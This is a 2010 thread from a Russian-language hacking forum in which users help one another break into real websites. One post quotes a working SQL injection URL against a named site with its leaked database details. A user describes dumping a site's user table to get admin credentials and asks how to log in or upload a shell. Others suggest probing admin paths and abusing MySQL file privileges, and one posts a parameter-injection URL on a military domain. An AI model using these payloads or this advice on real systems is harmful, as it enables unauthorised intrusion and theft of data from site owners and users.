ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, сейчас доступен на antichat.xyz.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12071  
Старый 18.03.2010, 17:53
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Скажите, если у меня есть логин и пароль админа сайта, как залогинится под ним?
На сайте нет возможности ввести логин, пасс. Слышал, что можно залить шелл, или это не то?
У кого есть ссылка на какую-то статью на эту тему напишите.
 
Ответить с цитированием

  #12072  
Старый 18.03.2010, 17:54
scorpic393
Banned
Регистрация: 05.02.2010
Сообщений: 70
Провел на форуме:
177258

Репутация: 5
По умолчанию

Цитата:
Сообщение от Strilo4ka  
скуля есть
PHP код:
http://met-con.com/mdc/index.php?page=-1+union+select+1,concat(version(),0x40,database(),0x40,user()),3,4,5--+ 
5.0.89-community@metcon_web@metcon_webuser@localhost
да я знаю.но мне она нах не нужна, т.к. там .htpasswd auth
 
Ответить с цитированием

  #12073  
Старый 18.03.2010, 19:12
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

Цитата:
Сообщение от CyberHunter  
Скажите, если у меня есть логин и пароль админа сайта, как залогинится под ним?
На сайте нет возможности ввести логин, пасс. Слышал, что можно залить шелл, или это не то?
У кого есть ссылка на какую-то статью на эту тему напишите.
Шелл пока немного не то. Хотя смотря каким макаром ты достал логин и пасс.
Попробуй поискать админку. www.site.ru/admin
или другие варианты мб adm.php ну вобщем дофига. Если нет то пиши лс и адресок сайта мб помогу.
 
Ответить с цитированием

  #12074  
Старый 18.03.2010, 19:18
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Цитата:
Попробуй поискать админку. www.site.ru/admin
или другие варианты мб adm.php ну вобщем дофига. Если нет то пиши лс и адресок сайта мб помогу.
Это знаю, пробивал - нет.
А почему шелл - не то? Дайте у кого есть инфу на эту тему.
 
Ответить с цитированием

  #12075  
Старый 18.03.2010, 19:22
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

Дак думаю про mysql.user и file priv = Y и ковычки ты знаешь тут объяснять не надо. Ты способ скажи каким ты пароли достал скули и мб СИ ? А в админку мб вход только с определенных IP ?
 
Ответить с цитированием

  #12076  
Старый 18.03.2010, 19:44
FAPSI
Banned
Регистрация: 18.09.2008
Сообщений: 23
Провел на форуме:
94916

Репутация: 5
По умолчанию

http://extensis.cnrc.navy.mil/index.htm?content=http://google.com

Помогите довести до ума
 
Ответить с цитированием

  #12077  
Старый 18.03.2010, 19:52
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Цитата:
Дак думаю про mysql.user и file priv = Y и ковычки ты знаешь тут объяснять не надо. Ты способ скажи каким ты пароли достал скули и мб СИ ? А в админку мб вход только с определенных IP ?
Админку достал из БД. В таблице юзеров был и админ. Так как это реализовать?
 
Ответить с цитированием

  #12078  
Старый 18.03.2010, 19:54
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

Бд слита или есть доступ к phpmyadmin?
 
Ответить с цитированием

  #12079  
Старый 18.03.2010, 19:59
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

Цитата:
Сообщение от FAPSI  
http://extensis.cnrc.navy.mil/index.htm?content=http://google.com

Помогите довести до ума

Обычный фрейм.
 
Ответить с цитированием

  #12080  
Старый 18.03.2010, 19:59
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Цитата:
Бд слита или есть доступ к phpmyadmin?
Я просто прочитал бд и увидел там ники и пароли юзеров. Доступа к пхпадмин - нет.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ